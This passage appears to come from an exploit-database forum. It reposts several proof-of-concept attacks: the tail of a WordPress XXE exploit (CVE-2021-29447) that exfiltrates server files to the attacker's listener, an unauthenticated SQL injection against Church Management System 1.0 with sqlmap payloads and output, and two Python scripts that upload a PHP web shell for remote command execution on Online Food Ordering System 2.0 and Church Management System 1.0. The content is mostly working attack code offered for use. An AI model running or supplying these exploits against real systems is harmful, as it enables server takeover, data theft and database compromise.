r.cookies print("[+] Getting Wp Nonce ... ") res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies) wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) if len(wp_nonce_list) == 0 : print("[-] Failed to retrieve the _wpnonce") exit(0) else : wp_nonce = wp_nonce_list[0] print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce) print("[+] Uploading the wav file ... ") postData = { 'name': 'payload.wav', 'action': 'upload-attachment', '_wpnonce': wp_nonce } wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))} r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies) if r_upload.status_code == 200: image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] print('[+] Wav uploaded successfully') else : print("[-] Failed to receive a response for uploaded! Try again . \n") exit(0) EOT python3 .upload.py } # Server Sniffer serverSniffer(){ statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid) } # Load file and decoder loadFile(){ content="http.server.log" wavUpload while : do if [[ -s $content ]]; then echo "[+] Obtaining file information..." sleep 5s # Increase time if the server is slow base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u) # Check file exists echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php sizeCheck=$(wc -c decode.php | awk '{printf $1}') if [[ $sizeCheck -gt "46" ]]; then php decode.php else echo "[!] File does not exist or is not allowed to be read." fi break fi done } # Cleanup cleanup(){ kill $(cat http.server.pid) &>/dev/null rm http.server.log http.server.pid &>/dev/null rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null } # Execute logoType # Checking parameters if [[ $# -ne 5 ]];then echo "[!] Parameters are missing!!!" echo "" echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST" else # Test Connection... echo "[*] Test connection to WordPress..." # WP Auth authCheck=$(curl -i -s -k -X $'POST' \ -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'wordpress_test_cookie=WP%20Cookie%20check' \ --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \ "http://$rHost/wp-login.php" > .cookies.tmp) auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }') # Running authentication with WordPress. if [[ $auth != "302" ]]; then echo "[-] Authentication failed ! Check username and password" else echo "[+] Authentication successfull!!!" # Create wav & dtd file wavCreate dtdCreate serverSniffer loadFile cleanup fi fi
  23. ISHACK AI BOT

    Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated) # Exploit Author: Erwin Krazek (Nero) # Date: 17/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Vendor: oretnom23 # Version: v1.0 # Tested on: Linux, Apache, Mysql # Exploit Description: Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack. # Vulnerable Code In search.php on line 28 $count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows; Sqlmap command: sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch Output: --- Parameter: search (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- - --- [17:33:38] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.46, PHP back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [17:33:38] [INFO] fetching database names available databases [4]: [*] church_db [*] information_schema [*] mysql [*] performance_schema
  24. ISHACK AI BOT

    Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip # Version: 2.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session. # 2. Set the 'action' parameter of the POST request to 'save_settings'. # - `ajax.php?action=save_settings` # 3. Capture request in burp and replace with with following request. ''' POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251 Content-Length: 754 Origin: http://localhost Connection: close Referer: http://localhost/fos/admin/index.php?page=site_settings Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="name" adsa -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="email" [email protected] -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="contact" asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="about" asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream <?php echo phpinfo();?> -----------------------------120025571041714278883588636251-- ''' # ` Image uploader is renaming your payload using the following function. # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Online Food Ordering System v2.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/assets/img/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'name':'test', 'email':'[email protected]', 'contact':'+6948 8542 623','about':'hello world'} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data) shell_upload = True if("1" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)
  25. ISHACK AI BOT

    Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Version: 1.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access the 'classes/Users.php', as it does not check for an authenticated user session. # 2. Set the 'f' parameter of the POST request to 'save'. # - `Users.php?f=save` # 3. Capture request in burp and replace with with following request. ''' POST /church_management/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550 Content-Length: 859 Origin: http://localhost Connection: close Referer: http://localhost/church_management/admin/?page=user Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="id" 1 -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="lastname" Admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="username" admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="password" -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream <?php echo phpinfo(); ?> -----------------------------91105564325608762312322546550-- ''' # ` Image uploader is renaming your payload using the following function. # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Church Management System v1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" .----------. .-''-. / / . __ __ ___ .' .-. ) / ______.' .'| | |/ `.' `. / .' / / / /_ .' | | .-. .-. ' (_/ / / / '''--. < | __ __ | | | | | | ,.----------. / / '___ `. | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. | | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) | | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' / | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'` | | \ \ / / | |_/ / | |_ / /.-'_.' '------''' ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.' '------' '---'`--' `" `--' `" ( _.-' abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data) shell_upload = True if("Undefined index: id in" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)